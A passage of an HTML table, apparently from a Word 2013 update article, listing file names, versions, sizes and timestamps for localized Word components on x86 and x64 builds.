blocks.dotx</td><td>\u00a0</td><td>3608062</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1031</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3603386</td><td>26-Feb-17</td><td>02:01</td></tr><tr><td>document_parts.dot_1032</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3653167</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_3082</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3612006</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1061</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3604130</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1035</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3603428</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1036</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3619560</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1037</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3629591</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1081</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3644334</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1050</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3607442</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1038</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3604785</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1057</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3609041</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1040</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3599032</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1041</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3636899</td><td>26-Feb-17</td><td>02:01</td></tr><tr><td>document_parts.dot_1087</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3634700</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1042</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3628333</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1063</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3622044</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1062</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3611384</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1086</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3604931</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1044</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3608018</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1043</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3601853</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1045</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3609394</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1046</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3617732</td><td>26-Feb-17</td><td>02:03</td></tr><tr><td>document_parts.dot_2070</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3613701</td><td>26-Feb-17</td><td>02:03</td></tr><tr><td>document_parts.dot_1048</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3617400</td><td>26-Feb-17</td><td>02:03</td></tr><tr><td>document_parts.dot_1049</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3646588</td><td>26-Feb-17</td><td>02:03</td></tr><tr><td>document_parts.dot_1051</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3613567</td><td>26-Feb-17</td><td>02:03</td></tr><tr><td>document_parts.dot_1060</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3604721</td><td>26-Feb-17</td><td>02:03</td></tr><tr><td>document_parts.dot_2074</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3617809</td><td>26-Feb-17</td><td>02:03</td></tr><tr><td>document_parts.dot_1053</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3609521</td><td>26-Feb-17</td><td>02:03</td></tr><tr><td>document_parts.dot_1054</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3653990</td><td>26-Feb-17</td><td>02:03</td></tr><tr><td>document_parts.dot_1055</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3607036</td><td>26-Feb-17</td><td>02:03</td></tr><tr><td>document_parts.dot_1058</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3649803</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_1066</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3631479</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_2052</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3615970</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>document_parts.dot_1028</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3627311</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>wordicon.exe</td><td>wordicon.exe</td><td>15.0.4553.1000</td><td>3015336</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>pdfreflow.exe</td><td>pdfreflow.exe</td><td>15.0.4909.1000</td><td>9611992</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>wwintl.dll.idx_dll_1025</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117440</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.rest.idx_dll_1025</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>526016</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll.idx_dll_1026</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.rest.idx_dll_1026</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>533696</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll.idx_dll_1029</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.rest.idx_dll_1029</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>630976</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll.idx_dll_1030</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114368</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.rest.idx_dll_1030</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>611496</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll.idx_dll_1031</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115904</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.rest.idx_dll_1031</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>624832</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll.idx_dll_1032</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115904</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.rest.idx_dll_1032</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>528064</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll.idx_dll_1033</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117504</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>wwintl.rest.idx_dll_1033</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1501</td><td>628424</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>wwintl.dll.idx_dll_3082</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115392</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.rest.idx_dll_3082</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>630464</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll.idx_dll_1061</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.rest.idx_dll_1061</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>528064</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll.idx_dll_1035</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117440</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.rest.idx_dll_1035</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>621224</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll.idx_dll_1036</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115392</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.rest.idx_dll_1036</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>628416</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll.idx_dll_1037</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.rest.idx_dll_1037</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>520360</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll.idx_dll_1081</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115904</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.rest.idx_dll_1081</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>524480</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll.idx_dll_1050</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>118976</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.rest.idx_dll_1050</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>625832</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll.idx_dll_1038</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116416</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.rest.idx_dll_1038</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>623808</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll.idx_dll_1057</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.rest.idx_dll_1057</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>531136</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll.idx_dll_1040</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114880</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.rest.idx_dll_1040</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>620712</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll.idx_dll_1041</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115400</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.rest.idx_dll_1041</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>496296</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll.idx_dll_1087</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>113344</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1087</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>525504</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_1042</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>113344</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1042</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>511680</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_1063</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117440</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1063</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>522408</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_1062</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>118976</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1062</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>532672</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_1086</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1086</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>530112</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_1044</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114880</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1044</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>614056</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_1043</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114880</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1043</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>625856</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_1045</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117952</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1045</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>528064</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_1046</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>118464</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1046</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>637120</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_2070</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>118464</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_2070</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>637632</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_1048</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117440</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1048</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>618664</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_1049</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115904</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1049</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>514728</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_1051</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117440</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1051</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>631488</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_1060</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1060</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>612520</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_2074</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117952</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_2074</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>522408</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_1053</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114368</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1053</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>621760</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_1054</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114880</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1054</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>519872</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_1055</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117952</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1055</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>625320</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_1058</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1058</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>533184</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_1066</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117960</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1066</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>527528</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_2052</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116416</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_2052</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>517312</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll.idx_dll_1028</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114368</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.rest.idx_dll_1028</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>516800</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>winword.veman.xml</td><td>winword.visualelementsmanifest.xml</td><td>\u00a0</td><td>342</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>winword.veman.xml</td><td>winwordd.visualelementsmanifest.xml</td><td>\u00a0</td><td>342</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>bibform.xml_1033</td><td>bibform.xml</td><td>\u00a0</td><td>111310</td><td>23-Feb-17</td><td>04:30</td></tr><tr><td>wwintl.dll_1033</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>794808</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>msword.olb</td><td>msword.olb</td><td>\u00a0</td><td>924832</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>winword.exe</td><td>winword.exe</td><td>15.0.4911.1000</td><td>1931968</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>wrd12cnv.dll</td><td>wordcnv.dll</td><td>15.0.4911.1000</td><td>6334144</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>wrd12pxy.cnv</td><td>wordcnvpxy.cnv</td><td>\u00a0</td><td>25168</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>wrd12exe.exe</td><td>wordconv.exe</td><td>15.0.4454.1000</td><td>22096</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>wwlib.dll</td><td>wwlib.dll</td><td>15.0.4911.1000</td><td>21823168</td><td>23-Feb-17</td><td>04:29</td></tr></tbody></table><h4>For all supported x64-based versions of Word 2013</h4><table class=\"table\"><tbody><tr><th>File identifier</th><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th></tr><tr><td>calligra.dll</td><td>calligra.dll</td><td>15.0.4545.1000</td><td>328392</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>bibform.xml_1025</td><td>bibform.xml</td><td>\u00a0</td><td>106100</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>wac.word.wwintl.dll_1025</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1068736</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1025</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1068736</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1025</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1068736</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_1026</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1076928</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1026</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1076928</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1026</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1076928</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>bibform.xml_1029</td><td>bibform.xml</td><td>\u00a0</td><td>112512</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>wac.word.wwintl.dll_1029</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1145024</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1029</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1145024</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1029</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1145024</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_1030</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>985272</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1030</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>985272</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1030</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>985272</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>bibform.xml_1031</td><td>bibform.xml</td><td>\u00a0</td><td>114240</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>wac.word.wwintl.dll_1031</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1073344</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1031</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1073344</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1031</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1073344</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>bibform.xml_1032</td><td>bibform.xml</td><td>\u00a0</td><td>114340</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>wac.word.wwintl.dll_1032</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1211584</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1032</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1211584</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1032</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1211584</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>bibform.xml_3082</td><td>bibform.xml</td><td>\u00a0</td><td>114930</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>wac.word.wwintl.dll_3082</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1020600</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_3082</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1020600</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_3082</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1020600</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_1061</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1001664</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1061</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1001664</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1061</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1001664</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_1035</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1004736</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1035</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1004736</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1035</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1004736</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>bibform.xml_1036</td><td>bibform.xml</td><td>\u00a0</td><td>114844</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>wac.word.wwintl.dll_1036</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1129152</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1036</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1129152</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1036</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1129152</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>bibform.xml_1037</td><td>bibform.xml</td><td>\u00a0</td><td>106424</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>wac.word.wwintl.dll_1037</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1059008</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1037</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1059008</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1037</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1059008</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_1081</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1046200</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1081</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1046200</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1081</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1046200</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_1050</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1026752</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1050</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1026752</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1050</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1026752</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>bibform.xml_1038</td><td>bibform.xml</td><td>\u00a0</td><td>112560</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>wac.word.wwintl.dll_1038</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1165496</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1038</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1165496</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1038</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1165496</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wac.word.wwintl.dll_1057</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>946368</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1057</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>946368</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.dll_1057</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>946368</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>bibform.xml_1040</td><td>bibform.xml</td><td>\u00a0</td><td>112426</td><td>26-Feb-17</td><td>02:05</td></tr><tr><td>wac.word.wwintl.dll_1040</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1027264</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1040</td><td>wwintl.dll</td><td>15.0.4911.1001</td><td>1027264</td><td>26-Feb-17</td><td>01:31</td></tr><tr><td>wwintl.